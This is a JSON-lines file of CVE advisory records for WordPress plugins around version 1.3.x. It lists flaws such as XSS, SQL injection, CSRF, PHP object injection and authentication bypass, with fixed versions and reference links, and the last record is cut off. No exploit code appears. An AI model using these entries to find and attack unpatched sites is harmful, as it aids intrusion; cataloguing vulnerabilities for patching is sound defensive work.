{"CVE_ID":"CVE-2024-1845","slug":"vikrentcar","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The VikRentCar Car Rental Management System WordPress plugin before 1.3.2 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8d7b564-36e0-4f05-9b49-1b441f453d0a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8d7b564-36e0-4f05-9b49-1b441f453d0a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2752","slug":"wc-customer-source","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The Where Did You Hear About Us Checkout Field for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via order meta in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with shop manager-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbee3720-6ab9-4470-b2d2-09824db8de4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbee3720-6ab9-4470-b2d2-09824db8de4d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075865%40wc-customer-source%2Ftrunk&old=3054024%40wc-customer-source%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075865%40wc-customer-source%2Ftrunk&old=3054024%40wc-customer-source%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13373","slug":"exertio-framework","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The Exertio Framework plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.3.1. This is due to the plugin not properly validating a user's identity prior to updating their password through the fl_forgot_pass_new() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/exertio-freelance-marketplace-wordpress-theme\\\/30602587\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/exertio-freelance-marketplace-wordpress-theme\\\/30602587\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/897ce9a9-8b3e-40bc-9815-c55cc7a838f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/897ce9a9-8b3e-40bc-9815-c55cc7a838f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31015","slug":"mailhawk","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"Improper Control of Filename for Include\/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Adrian Tobey WordPress SMTP Service, Email Delivery Solved! \u2014 MailHawk allows PHP Local File Inclusion. This issue affects WordPress SMTP Service, Email Delivery Solved! \u2014 MailHawk: from n\/a through 1.3.1.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/mailhawk\\\/vulnerability\\\/wordpress-wordpress-smtp-service-email-delivery-solved-mailhawk-1-3-1-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/mailhawk\\\/vulnerability\\\/wordpress-wordpress-smtp-service-email-delivery-solved-mailhawk-1-3-1-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2542","slug":"embed-form","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The Jotform Online Forms \u2013 Drag & Drop Form Builder, Securely Embed Contact Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. CVE-2024-32527 is likely a duplicate of this issue.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90c34a01-a0d1-4305-b74b-b5a568a42b13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90c34a01-a0d1-4305-b74b-b5a568a42b13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3073311%40embed-form%2Ftrunk&old=2981633%40embed-form%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3073311%40embed-form%2Ftrunk&old=2981633%40embed-form%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4489","slug":"woocommerce-products-filter","versionEndExcluding":"1.3.2","description":"The HUSKY WordPress plugin before 1.3.2 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/067573f2-b1e6-49a9-8c5b-f91e3b9d722f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/067573f2-b1e6-49a9-8c5b-f91e3b9d722f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4695","slug":"move-addons","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The Move Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72662a59-f41c-4df7-aa04-7243ff43c48d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72662a59-f41c-4df7-aa04-7243ff43c48d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/data-table\\\/widget.php#L836\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/data-table\\\/widget.php#L836\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/team-member\\\/widget.php#L1464\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/team-member\\\/widget.php#L1464\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/event-calendar\\\/widget.php#L932\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/event-calendar\\\/widget.php#L932\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/mailchimp\\\/widget.php#L728\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/mailchimp\\\/widget.php#L728\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/user-login\\\/widget.php#L1146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/user-login\\\/widget.php#L1146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/shop-product-grid\\\/widget.php#L1203\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/shop-product-grid\\\/widget.php#L1203\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088859\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088859\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12059","slug":"elementinvader-addons-for-elementor","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The ElementInvader Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.1 via the eli_option_value shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract arbitrary options from the wp_options table.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203139%40elementinvader-addons-for-elementor&new=3203139%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203139%40elementinvader-addons-for-elementor&new=3203139%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf7ec469-70b7-4ec2-83df-c788c76730b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf7ec469-70b7-4ec2-83df-c788c76730b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11766","slug":"gs-books-showcase","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The WordPress Book Plugin for Displaying Books in Grid, Flip, Slider, Popup Layout and more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gs_book_showcase' shortcode in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-books-showcase\\\/tags\\\/1.3.1\\\/gs-bookshowcase-files\\\/includes\\\/templates\\\/gs_bookshowcase_structure_1_square.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-books-showcase\\\/tags\\\/1.3.1\\\/gs-bookshowcase-files\\\/includes\\\/templates\\\/gs_bookshowcase_structure_1_square.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204642%40gs-books-showcase&new=3204642%40gs-books-showcase&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204642%40gs-books-showcase&new=3204642%40gs-books-showcase&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3b40b73-4dec-4a96-a634-3bd3d74616ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3b40b73-4dec-4a96-a634-3bd3d74616ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13802","slug":"bandsintown","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The Bandsintown Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bandsintown_events' shortcode in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bandsintown\\\/tags\\\/1.3.1\\\/bandsintown.php#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bandsintown\\\/tags\\\/1.3.1\\\/bandsintown.php#L134\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bab22f2e-0998-4401-ae9f-45bdce658c4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bab22f2e-0998-4401-ae9f-45bdce658c4f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13713","slug":"wpexperts-square-for-give","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The WPExperts Square For GiveWP plugin for WordPress is vulnerable to SQL Injection via the 'post' parameter in all versions up to, and including, 1.3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpexperts-square-for-give\\\/trunk\\\/includes\\\/class-give-square.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpexperts-square-for-give\\\/trunk\\\/includes\\\/class-give-square.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242658\\\/wpexperts-square-for-give\\\/trunk\\\/includes\\\/class-give-square.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242658\\\/wpexperts-square-for-give\\\/trunk\\\/includes\\\/class-give-square.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7863c5fb-1eda-41a3-b8ec-054784ab2438?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7863c5fb-1eda-41a3-b8ec-054784ab2438?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13539","slug":"aforms-eats","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The AForms Eats plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.3.1. This is due the \/vendor\/aura\/payload-interface\/phpunit.php file being publicly accessible and displaying error messages. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aforms-eats\\\/trunk\\\/vendor\\\/aura\\\/payload-interface\\\/phpunit.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aforms-eats\\\/trunk\\\/vendor\\\/aura\\\/payload-interface\\\/phpunit.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232963%40aforms-eats&new=3232963%40aforms-eats&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232963%40aforms-eats&new=3232963%40aforms-eats&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e1950c7-cc7c-48cf-974e-f691ef61d6be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e1950c7-cc7c-48cf-974e-f691ef61d6be?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12312","slug":"print-science-designer","versionImpact":"1.3.152","versionEndExcluding":"1.3.153","description":"The Print Science Designer plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.152 via deserialization of untrusted input through the 'designer-saved-projects' cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.3.153, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/print-science-designer\\\/tags\\\/1.3.152\\\/includes\\\/saved-projects.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/print-science-designer\\\/tags\\\/1.3.152\\\/includes\\\/saved-projects.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/print-science-designer\\\/tags\\\/1.3.153\\\/includes\\\/saved-projects.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/print-science-designer\\\/tags\\\/1.3.153\\\/includes\\\/saved-projects.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8008b5e2-f3b4-492c-8e50-b673f725b2b1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8008b5e2-f3b4-492c-8e50-b673f725b2b1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9218","slug":"magazine-blocks","versionImpact":"1.3.14","versionEndExcluding":"1.3.15","description":"The Magazine Blocks \u2013 Blog Designer, Magazine & Newspaper Website Builder, Page Builder with Posts Blocks, Post Grid plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3.14. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4c27225-f9db-4ae5-bb1f-ce8648c216eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4c27225-f9db-4ae5-bb1f-ce8648c216eb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161000\\\/#file13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161000\\\/#file13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magazine-blocks\\\/tags\\\/1.3.14\\\/includes\\\/Blocks.php#L334\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magazine-blocks\\\/tags\\\/1.3.14\\\/includes\\\/Blocks.php#L334\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9450","slug":"easync-booking","versionImpact":"1.3.14","versionEndExcluding":"1.3.15","description":"The Free Booking Plugin for Hotels, Restaurants and Car Rentals  WordPress plugin before 1.3.15 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in subscriber change them via a CSRF attack","recommendation":"Update to version 1.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4b9568a-af74-40df-89c1-550e8515ca0a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4b9568a-af74-40df-89c1-550e8515ca0a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8277","slug":"woocommerce-photo-reviews","versionImpact":"1.3.13.2","versionEndExcluding":"1.3.14","description":"The WooCommerce Photo Reviews Premium plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.3.13.2. This is due to the plugin not properly validating what user transient is being used in the login() function and not properly verifying the user's identity. This makes it possible for unauthenticated attackers to log in as user that has dismissed an admin notice in the past 30 days, which is often an administrator. Alternatively, a user can log in as any user with any transient that has a valid user_id as the value, though it would be more difficult to exploit this successfully.","recommendation":"Update to version 1.3.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1e2d370-a716-4d6b-8e23-74db2fbd0760?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1e2d370-a716-4d6b-8e23-74db2fbd0760?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-photo-reviews\\\/21245349\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-photo-reviews\\\/21245349\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8662","slug":"koko-analytics","versionImpact":"1.3.12","versionEndExcluding":"1.3.13","description":"The Koko Analytics plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3.12. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd15c7c8-6538-4443-a409-0d34ff893963?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd15c7c8-6538-4443-a409-0d34ff893963?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153087\\\/koko-analytics\\\/trunk\\\/src\\\/views\\\/settings-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153087\\\/koko-analytics\\\/trunk\\\/src\\\/views\\\/settings-page.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/koko-analytics\\\/tags\\\/1.3.12\\\/src\\\/views\\\/settings-page.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/koko-analytics\\\/tags\\\/1.3.12\\\/src\\\/views\\\/settings-page.php#L33\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7147","slug":"jet-blocks","versionImpact":"1.3.12","versionEndExcluding":"1.3.12.1","description":"The JetBlocks for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple placeholder parameters in all versions up to, and including, 1.3.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21f8908c-bcfc-4ca1-bc8b-80a80c4a5a4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21f8908c-bcfc-4ca1-bc8b-80a80c4a5a4f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetblocks\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetblocks\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1118","slug":"podlove-subscribe-button","versionImpact":"1.3.10","versionEndExcluding":"1.3.11","description":"The Podlove Subscribe button plugin for WordPress is vulnerable to UNION-based SQL Injection via the 'button' attribute of the podlove-subscribe-button shortcode in all versions up to, and including, 1.3.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f234f05f-e377-4e89-81e1-f47ff44eebc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f234f05f-e377-4e89-81e1-f47ff44eebc5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/podlove\\\/podlove-subscribe-button-wp-plugin\\\/commit\\\/b16b7a2e98db4c642ca671b0aede4dbfce4578b3\",\"name\":\"https:\\\/\\\/github.com\\\/podlove\\\/podlove-subscribe-button-wp-plugin\\\/commit\\\/b16b7a2e98db4c642ca671b0aede4dbfce4578b3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032152%40podlove-subscribe-button&new=3032152%40podlove-subscribe-button&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032152%40podlove-subscribe-button&new=3032152%40podlove-subscribe-button&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-51682","slug":"ht-builder","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in HasThemes HT Builder \u2013 WordPress Theme Builder for Elementor allows Stored XSS.This issue affects HT Builder \u2013 WordPress Theme Builder for Elementor: from n\/a through 1.3.0.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ht-builder\\\/wordpress-ht-builder-wordpress-theme-builder-for-elementor-plugin-1-3-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ht-builder\\\/wordpress-ht-builder-wordpress-theme-builder-for-elementor-plugin-1-3-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4298","slug":"123-chat-videochat","versionEndExcluding":"1.3.1","description":"The 123.chat WordPress plugin before 1.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36285052-8464-4fd6-b4b1-c175e730edad\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36285052-8464-4fd6-b4b1-c175e730edad\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25151","slug":"cartflows","versionEndExcluding":"1.3.1","description":"The Funnel Builder plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the activate_plugin function in versions up to, and including, 1.3.0. This makes it possible for authenticated attackers to activate any plugin on the vulnerable 